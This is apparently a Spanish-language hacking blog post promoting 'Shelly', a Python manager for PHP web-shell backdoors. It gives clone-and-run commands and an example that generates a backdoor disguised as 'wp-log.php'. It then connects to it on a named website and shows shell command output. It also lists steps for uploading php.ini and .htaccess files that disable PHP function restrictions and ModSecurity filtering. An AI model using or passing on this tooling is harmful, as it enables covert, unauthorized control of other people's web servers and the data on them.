Descarga tu guía de trucos informáticos aquí
Shelly Simple Administrador de Backdoor con Python
Shelly Simple Administrador de Backdoor con Python

Shelly: Simple Administrador de Backdoor con Python

Un simple gestor de Backdoor con Python (basado en weevely) que funciona para controlar remotamente un sitio web.

Backdoor con Shelly
Backdoor con Shelly

Instalación

$ git clone https://github.com/tegal1337/Shelly
$ cd Shelly
$ python3 shell.py

Requisitos

sudo pip install -r requirements.txt

Ejemplo

python3 shell.py -g wp-log -p tegal1337
   ______      ____
  / __/ / ___ / / __ __
 _\ \/ _ / -_/ / / // /
/___/_//_\__/_/_/\_, /
                /___/  v.1
--------------------------
Python shell - Tegal1337 |
Generate :
[+] ./backdoor.py -g "nama_shell" -p "password"
Connect Server :
[+] ./backdoor.py -u "url_shell" -p "password"

Backdoor berhasil dibuat dengan nama wp-log.php dan password tegal1337

dalpan@Tegal1337:~/Tools$ python3 shell.py -u "https://www.pamz3d.com/wp-log.php" -p tegal1337
/opt/lampp/htdocs/php-futsal$ id
uid=501(pamz3d) gid=501(pamz3d) groups=501(pamz3d)
Captura 1 Shelly
Captura 1 Shelly
Captura 2 Shelly
Captura 2 Shelly

Desactivar la función Bypass

  • Busca la carpeta con permisos 777 (rwx rwx rwx)
  • Sube el archivo php.ini
safe_mode = OFF
disable_functions = NONE
  • Y sube el archivo .htaccess
SecFilterEngine Off
SecFilterScanPOST Off

Contacto

  • Email : contact@dalpan.co
  • FB : fb.com/dalpan.me
Más artículos
CMSeeK Suite de Detección y Explotación CMS
CMSeeK: Suite de Detección y Explotación CMS